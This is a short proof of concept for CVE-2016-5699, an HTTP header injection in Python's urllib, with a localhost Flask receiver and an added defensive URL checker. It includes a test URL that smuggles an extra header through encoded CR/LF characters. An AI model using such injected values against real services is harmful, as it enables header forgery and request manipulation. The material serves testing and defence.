
Reference: https://github.com/bunseokbot/CVE-2016-5699-poc


poc.py
import urllib.request
import traceback

print("#######################################")
print("Testing HTTP Header injection in Python")
print("Origin : http://blog.blindspotsecurity.com/2016/06/advisory-http-header-injection-in.html")
print("bunseokbot@UpRoot")
print("#######################################")

while True:
	try:
		url = input("URL : ")
		info = urllib.request.urlopen(url).info()
		print(info)
	except KeyboardInterrupt as kie:
		print("KeyboardInterrupt event found!\nTerminating Program..")
		break
	except Exception as e:
		print(traceback.format_exc())

receiver.py
from flask import Flask, request

app = Flask(__name__)
app.debug = True

@app.route("/vulntest")
def vulntest():
	print("###############################################")
	print("Request Header")
	print("###############################################")
	print(request.headers)
	print("###############################################")
	return ''

if __name__ == "__main__":
	app.run(port=12345, threaded=True) # localhost only

TEST URL : http://127.0.0.1%0d%0aInjection-success:%20success%0d%0adummy:%20:12345/vulntest
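A defensive check for the test URL above, as an added example that is not part of the original post or the referenced PoC: it flags URLs whose authority, once percent-decoded, contains CR, LF, space or other control characters, so they can be rejected before being handed to urlopen. The names `authority_violations` and `is_safe_url` are hypothetical, and the sample URLs other than the page's test URL are constructed.

```python
from urllib.parse import urlsplit, unquote

# Control characters, space and DEL. None are valid in a URL authority, and
# CR/LF there is what lets the host string spill into extra header lines.
FORBIDDEN = {chr(c) for c in range(0x21)} | {"\x7f"}

# The test URL from this page.
TEST_URL = ("http://127.0.0.1%0d%0aInjection-success:%20success"
            "%0d%0adummy:%20:12345/vulntest")


def authority_violations(url):
    """Return a sorted list of forbidden characters found in the raw URL
    or in its percent-decoded authority. An empty list means none found."""
    # Check the raw string first: recent urlsplit() versions silently
    # strip literal tab/CR/LF, which would hide them from a later check.
    found = {c for c in url if c in FORBIDDEN}
    # Decode only the authority (host:port). Percent-escapes in the path
    # or query stay encoded on the wire and are not header boundaries.
    netloc = unquote(urlsplit(url).netloc)
    found |= {c for c in netloc if c in FORBIDDEN}
    return sorted(found)


def is_safe_url(url):
    """True if the URL parses and its authority has no forbidden characters."""
    try:
        return not authority_violations(url)
    except ValueError:  # urlsplit() rejects some malformed authorities
        return False


if __name__ == "__main__":
    samples = [
        TEST_URL,
        "http://127.0.0.1:12345/vulntest",             # constructed, benign
        "http://127.0.0.1:12345/vulntest?q=a%0d%0ab",  # constructed, escape in query
    ]
    for u in samples:
        verdict = "ok" if is_safe_url(u) else "REJECT"
        print(f"{verdict:6} {authority_violations(u)!r} {u}")
```
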

